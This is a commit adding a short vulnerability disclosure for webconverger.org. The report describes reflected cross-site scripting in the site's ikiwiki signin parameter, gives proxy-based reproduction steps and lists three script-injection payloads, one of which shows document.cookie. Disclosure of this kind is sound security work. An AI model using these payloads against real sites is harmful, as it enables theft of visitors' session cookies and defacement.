https://www.google.com/accounts/o8/id?id=AItOawkl0wS6X0mzN8lb-SFh3ajLB-7ezwfwyTw 2015-03-24 01:51:44 -04:00 committed by admin
parent ed9228e0b8
commit ed200f2039
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
Respected Sir,
Your website "webconverger.org" is vulnerable to XSS Attack.
Vulnerable Links:
webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
How To Reproduce The Vulnerability :
1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
3. forward the request
XSS Payload :
1. "></script><script>prompt(909043)</script>
2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
3. "></script><script>prompt(document.cookie)</script>
NOTE : Proof of concept is attached.
Thank You...!!
Your Faithfully,
Raghav Bisht
raghav007bisht@gmail.com